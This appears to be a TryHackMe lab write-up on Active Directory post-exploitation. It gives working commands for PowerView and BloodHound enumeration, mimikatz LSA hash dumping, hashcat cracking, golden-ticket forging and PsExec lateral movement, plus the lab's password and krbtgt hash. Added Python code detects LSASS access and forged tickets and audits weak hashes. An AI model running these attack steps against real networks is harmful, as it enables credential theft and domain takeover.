# Post-Exploitation Basics

**Room Link:** <https://tryhackme.com/room/postexploit>

## Presteps for Lab

### SharpHound Installation

The SharpHound version on the box is too old for the current version of BloodHound, so I had to update it.

**Kali**

```
git clone https://github.com/BloodHoundAD/BloodHound.git

scp -r BloodHound/Collectors/SharpHound.ps1 Administrator@$VICTIM:C:/Users/Administrator/
Password: P@$$W0rd
```

Added this line to SharpHound.ps1 before transferring it so I could run the collection command right away:

<figure><img src="/files/xPLv65ndmQvanqGqUzhg" alt=""><figcaption></figcaption></figure>

**Victim**

```
powershell -ep bypass
.\SharpHound.ps1
```

### BloodHound Installation

```
apt-get install bloodhound
neo4j console
```

<figure><img src="/files/ag1v6EBaZwpD3XqE76mv" alt=""><figcaption></figcaption></figure>

## Enumeration w/ Powerview

**Kali**

```
ssh Administrator@$VICTIM
Password: P@$$W0rd
```

**Victim**

Run the following to dot-source PowerView so its cmdlets are available in the session.

```
powershell -ep bypass
. .\Downloads\PowerView.ps1
```

Enumerate the domain users.

```
Get-NetUser | select cn
```

<figure><img src="/files/V9LyNUQvR3mOBbjJp5Tv" alt=""><figcaption></figcaption></figure>

Enumerate the domain groups.

```
Get-NetGroup -GroupName *admin*
```

<figure><img src="/files/1oLVQCeP7ZRebagm4lXt" alt=""><figcaption></figcaption></figure>

Find shared folders.

```
Invoke-ShareFinder
```

<figure><img src="/files/RLHHsEu1MiB59Xuv8NRv" alt=""><figcaption></figcaption></figure>

List the operating systems of the computers in the domain.

```
Get-NetComputer -fulldata | select operatingsystem
```

<figure><img src="/files/399SCBB0kAlhXFzuJEQo" alt=""><figcaption></figcaption></figure>

## Enumeration w/ Bloodhound

Run the SharpHound collector to gather the data BloodHound will map.

**Victim**

```
powershell -ep bypass
. .\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
```

Transfer the SharpHound results back to Kali. SCP can be used in this case.

**Kali**

```
scp Administrator@$VICTIM:C:/Users/Administrator/20230212071833_loot.zip loot.zip
Password: P@$$W0rd
```

### Mapping the network w/ BloodHound

```
bloodhound --no-sandbox
```

Drag the zip file onto the BloodHound window to import it.

<figure><img src="/files/PZNiHhnB9eXqWcFAjzUd" alt=""><figcaption></figcaption></figure>

Find all Domain Admins

<figure><img src="/files/XtQb8OKVZEGPE3FpQix3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lnQ9azNQlXmFbzbmStyy" alt=""><figcaption></figcaption></figure>

List all Kerberoastable accounts

<figure><img src="/files/YWldPOXC1RJL4xFcNP0j" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/tp4iGzkMGjwixv3ua4CA" alt=""><figcaption></figcaption></figure>

## Dumping hashes w/ mimikatz

**Kali**

```
ssh Administrator@$VICTIM
Password: P@$$W0rd
```

**Victim**

```
cd Downloads && mimikatz.exe
```

**Victim - Mimikatz**

```
privilege::debug
lsadump::lsa /patch
```

<figure><img src="/files/wi0vrSlbyghyp6CEHHNa" alt=""><figcaption></figcaption></figure>

Copy the mimikatz output back to Kali (saved here as hashes.txt).

![](/files/CrUJEQBAnBLwFvq4lkc9)

Output only the hashes and remove all duplicates into a new file.

**Kali**

```
cat hashes.txt | grep NTLM | awk -F ":" '{print $2}' | grep "\S" | sed 's/^[ \t]*//'  | sort | uniq > hash.txt
```

<figure><img src="/files/JXuA4mkCOMF5QUhyWX0g" alt=""><figcaption></figcaption></figure>

**Kali**

```
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show
```

<figure><img src="/files/nqmTmFlZaf1TEObM5sIt" alt=""><figcaption></figcaption></figure>
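hashcat mode 1000 is the NT hash: MD4 over the UTF-16LE encoding of the password, with no salt and a single round, which is why a wordlist run against hash.txt finishes in seconds. The following is an added example, not code from the original walkthrough, that implements that hash in pure Python and audits a hash.txt-style file for the empty-password hash and for hashes of a banned-password list; the banned list and the sample file contents are constructed.

```python
import struct
MASK32 = 0xFFFFFFFF
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is missing on many OpenSSL 3 builds."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    round3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(48):
            if i < 16:      # round 1: F, words in order, shifts 3/7/11/19
                v, k, s = f(b, c, d), i, (3, 7, 11, 19)[i % 4]
            elif i < 32:    # round 2: G + constant, words 0,4,8,12,1,5,..., shifts 3/5/9/13
                v, k, s = g(b, c, d) + 0x5A827999, (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4]
            else:           # round 3: H + constant, words 0,8,4,12,..., shifts 3/9/11/15
                v, k, s = h(b, c, d) + 0x6ED9EBA1, round3_order[i - 32], (3, 9, 11, 15)[i % 4]
            a, b, c, d = d, _rotl((a + v + x[k]) & MASK32, s), b, c
        a0, b0, c0, d0 = [(p + q) & MASK32 for p, q in ((a0, a), (b0, b), (c0, c), (d0, d))]
    return struct.pack("<4I", a0, b0, c0, d0)

def nt_hash(password: str) -> str:
    """The hashcat -m 1000 value: MD4 over UTF-16LE, unsalted, one round."""
    return md4(password.encode("utf-16-le")).hex()

def audit_hash_file(text: str, banned_passwords) -> dict:
    """Map each hash in a hash.txt-style file (one NT hash per line) to the banned password it equals, or '<empty>'."""
    banned = {nt_hash(p): p for p in banned_passwords}
    findings = {}
    for line in text.splitlines():
        h = line.strip().lower()
        if h == EMPTY_NT:
            findings[h] = "<empty>"
        elif h in banned:
            findings[h] = banned[h]
    return findings

# Constructed sample file, not output from the lab
SAMPLE_HASH_FILE = "8846F7EAEE8FB117AD06BDD830B7586C\n31d6cfe0d16ae931b73c59d7e0c089c0\n0123456789abcdef0123456789abcdef\n"
```

Because the hash is unsalted, identical passwords produce identical lines in hash.txt, so the `sort | uniq` step above also reveals password reuse across accounts.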

## Golden Ticket Attacks w/ mimikatz

**Kali**

```
ssh Administrator@$VICTIM
Password: P@$$W0rd
```

### Dump the krbtgt Hash

**Victim**

```
cd Downloads && mimikatz.exe
```

This dumps the hash and the security identifier (SID) of the Kerberos Ticket Granting Ticket account (krbtgt), which is what allows you to create a golden ticket. Take note of what is outlined in red; you'll need it to create the golden ticket.

**Victim - Mimikatz**

```
privilege::debug
lsadump::lsa /inject /name:krbtgt
```

<figure><img src="/files/Wf1vVky8ydieoQfGFfMt" alt=""><figcaption></figcaption></figure>
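Both `lsadump::lsa /patch` and `lsadump::lsa /inject` need a handle to lsass.exe with memory read/write or thread-creation rights, which `privilege::debug` (SeDebugPrivilege) makes possible; Sysmon event 10 (ProcessAccess) records that handle and its access mask. The following detection logic is an added example, not part of the room or of mimikatz: the tab-separated record layout, the sample records and the allow-list are constructed.

```python
# Access-mask bits that allow reading or writing LSASS memory or starting a thread in it
PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION = 0x0002, 0x0008
PROCESS_VM_READ, PROCESS_VM_WRITE = 0x0010, 0x0020
SUSPICIOUS_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE

# Hypothetical allow-list of images expected to open LSASS; a real one comes from your own baseline
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

def parse_sysmon_line(line: str) -> dict:
    """Parse one constructed 'Key=Value<TAB>Key=Value' Sysmon record into a dict."""
    return dict(field.split("=", 1) for field in line.split("\t") if "=" in field)

def lsass_access_findings(lines):
    """Return (SourceImage, GrantedAccess) for event 10 records that open lsass.exe with
    memory read/write or thread-creation rights from an image outside the allow-list."""
    findings = []
    for line in lines:
        ev = parse_sysmon_line(line)
        if ev.get("EventID") != "10":
            continue
        if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
            continue
        source = ev.get("SourceImage", "").lower()
        mask = int(ev.get("GrantedAccess", "0x0"), 16)
        if mask & SUSPICIOUS_MASK and source not in ALLOWED_SOURCES:
            findings.append((source, f"0x{mask:x}"))
    return findings

# Constructed sample records (tab separated), not real Sysmon output
SAMPLE_LOG = [
    "EventID=10\tSourceImage=C:\\Users\\Administrator\\Downloads\\mimikatz.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1FFFFF",
    "EventID=10\tSourceImage=C:\\Windows\\system32\\csrss.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1FFFFF",
    "EventID=10\tSourceImage=C:\\Windows\\system32\\taskmgr.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1000",
    "EventID=10\tSourceImage=C:\\Windows\\system32\\svchost.exe\tTargetImage=C:\\Windows\\notepad.exe\tGrantedAccess=0x1FFFFF",
    "EventID=1\tImage=C:\\Users\\Administrator\\Downloads\\mimikatz.exe",
]

if __name__ == "__main__":
    for src, mask in lsass_access_findings(SAMPLE_LOG):
        print(f"ALERT: {src} opened lsass.exe with access {mask}")
```

The 0x1000 record (PROCESS_QUERY_LIMITED_INFORMATION, what Task Manager uses) is deliberately not flagged; only masks that include the memory or thread bits matter.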

### Create a Golden Ticket

**Victim - Mimikatz**

```
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
```

<figure><img src="/files/ZmKyhpbAcZO38RQghFYQ" alt=""><figcaption></figcaption></figure>

### Use the Golden Ticket to access other machines

This will open a new command prompt that carries the golden ticket, giving you elevated access to all other machines on the network.

**Victim - Mimikatz**

```
misc::cmd
```

This doesn't actually work here because of how TryHackMe is set up, but in a real environment you would then be able to access other machines. In the example below you'd first need to find out what other machines exist to pull this off.

**Victim**

```
dir \\Desktop-1\c$
PsExec.exe \\Desktop-1 cmd.exe
```

<figure><img src="/files/yCraJK4lwwOcwpUzR6jZ" alt=""><figcaption></figcaption></figure>
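A golden ticket is a TGT forged offline from the krbtgt hash, so no domain controller ever logs a 4768 (TGT issued) for it, yet the 4769 service-ticket requests and the 4624 network logons it produces still appear; and with `/domain:controller.local` the forged ticket carries that FQDN into the logon's account-domain field, where genuine logons show the NetBIOS name CONTROLLER. The correlation below is an added example, not from the original page: the events are constructed and the domain name is the lab's.

```python
from datetime import datetime, timedelta

NETBIOS_DOMAIN = "CONTROLLER"        # NetBIOS name of the lab domain CONTROLLER.local
TGT_LIFETIME = timedelta(hours=10)   # default domain TGT lifetime; a renewal logs a fresh 4768

def golden_ticket_findings(events, netbios_domain=NETBIOS_DOMAIN):
    """events: dicts with ts (ISO 8601), id (4768/4769/4624), user, and for 4624 logon_type/domain.
    Aggregate the events of *every* DC before calling this; a TGT issued by another DC would
    otherwise look forged."""
    last_tgt = {}   # user -> time of the most recent 4768 (TGT issued by a DC)
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        t, user = datetime.fromisoformat(ev["ts"]), ev["user"].lower()
        if ev["id"] == 4768:
            last_tgt[user] = t
        elif ev["id"] == 4769:
            issued = last_tgt.get(user)
            if issued is None or t - issued > TGT_LIFETIME:
                findings.append(f"{user}: service ticket requested at {ev['ts']} but no DC issued a TGT")
        elif ev["id"] == 4624 and ev.get("logon_type") == 3:
            # Forged tickets made with /domain:<fqdn> show the FQDN (or a blank) as account domain
            if ev.get("domain", "").upper() != netbios_domain:
                findings.append(f"{user}: network logon with account domain '{ev.get('domain', '')}'")
    return findings

SAMPLE_EVENTS = [  # constructed, not exported from a real DC
    {"ts": "2023-02-12T07:00:00", "id": 4768, "user": "alice"},
    {"ts": "2023-02-12T07:05:00", "id": 4769, "user": "alice"},
    {"ts": "2023-02-12T07:06:00", "id": 4624, "user": "alice", "logon_type": 3, "domain": "CONTROLLER"},
    {"ts": "2023-02-12T08:00:00", "id": 4769, "user": "Administrator"},
    {"ts": "2023-02-12T08:00:01", "id": 4624, "user": "Administrator", "logon_type": 3, "domain": "controller.local"},
]

if __name__ == "__main__":
    for finding in golden_ticket_findings(SAMPLE_EVENTS):
        print("ALERT:", finding)
```

Both checks are heuristics: long-lived sessions with cached service tickets and incomplete log collection produce false positives, so treat a hit as a reason to pull the ticket lifetime and encryption type for that account rather than as proof.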

## Enumeration w/ Server Manager

**Kali**

```
rdesktop -d CONTROLLER -u Administrator $VICTIM
Password: P@$$W0rd
```

Open Active Directory

<figure><img src="/files/Nh1DJNZX86PRlrSRl7Ot" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/dDo0T6EgjcwPuLXaRvlf" alt=""><figcaption></figcaption></figure>

